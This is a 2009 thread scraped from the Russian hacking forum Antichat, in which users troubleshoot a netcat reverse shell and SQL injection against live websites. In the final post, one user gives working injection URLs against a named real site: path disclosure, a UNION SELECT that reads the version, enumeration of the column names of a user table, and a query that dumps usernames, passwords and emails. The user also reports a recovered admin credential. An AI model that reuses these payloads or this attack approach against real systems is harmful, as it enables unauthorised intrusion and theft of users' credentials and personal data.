Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.12.2009, 03:41
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от .:[melkiy]:.
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
Скорее NAT, а не динамик =))
|
|
|
25.12.2009, 03:42
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Сообщение от .:[melkiy]:.
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
неткат тоже не реагирует висит...
|
|
|
|
25.12.2009, 03:43
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Nightmarе
Скорее NAT, а не динамик =))
перепутал =(
Сообщение от a1ertso
неткат тоже не реагирует висит...
делай на дедик
|
|
|
|
25.12.2009, 03:47
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Сообщение от .:[melkiy]:.
делай на дедик
Всмысле через промежуточный хост?
|
|
|
|
25.12.2009, 03:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от a1ertso
Всмысле через промежуточный хост?
команды на шелле пашут хоть?)
|
|
|
|
25.12.2009, 03:53
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Сообщение от .:[melkiy]:.
команды на шелле пашут хоть?)
да)
|
|
|
|
25.12.2009, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)
|
|
|
|
26.12.2009, 00:09
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Nightmarе
Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)
мб фейковая скуля? 
|
|
|
|
26.12.2009, 10:31
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
|
|
|
|
26.12.2009, 12:34
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от superboys
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.
Код:
http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
А вот и скуля
Код:
http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
Код:
http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
Version: 5.0.82sp1-log
Админка: Z: jncjcb
Ничего интересного 
Даже обидно(
Код:
http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править  но там чтото недописано,и поэтому не получаеться)
Последний раз редактировалось m0Hze; 26.12.2009 в 13:14..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
